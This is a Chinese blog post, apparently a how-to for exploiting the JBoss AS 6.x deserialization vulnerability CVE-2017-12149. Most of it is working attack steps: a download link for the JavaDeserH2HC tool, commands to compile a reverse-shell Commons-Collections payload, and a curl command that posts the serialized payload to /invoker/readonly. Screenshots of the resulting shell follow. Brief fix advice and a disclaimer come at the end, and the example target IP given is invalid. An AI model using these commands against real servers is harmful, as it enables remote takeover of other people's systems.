检测目录: ![[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用](http://cn-sec.com/wp-content/uploads/2019/11/1177342977.png)
返回500 一般就是存在了。
下载工具:
http://scan.javasec.cn/java/JavaDeserH2HC.zip
使用方法:
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口 这个时候会生成一个ReverseShellCommonsCollectionsHashMap.ser文件,curl 这个二进制文件就可以了。
ReverseShellCommonsCollectionsHashMap.ser 打包到http://scan.javasec.cn/java/ReverseShellCommonsCollectionsHashMap.ser
curl http://192.268.197.25:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser 监听:![[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用](https://cn-sec.com/wp-content/uploads/2019/11/2039749710.png)
发送payload:
![[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用](https://cn-sec.com/wp-content/uploads/2019/11/1498446103.png)
服务器log:
![[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用](https://cn-sec.com/wp-content/uploads/2019/11/3186256326.png)
反弹结果:
![[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用](https://cn-sec.com/wp-content/uploads/2019/11/2587184788.png)
工具:
![[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用](http://cn-sec.com/wp-content/uploads/2019/11/1634840479.png)
done.
修复建议:
- 不需要 http-invoker.sar 组件的用户可直接删除此组件。
- 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中,对
http invoker 组件进行访问控制: <url-pattern>/*</url-pattern>
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论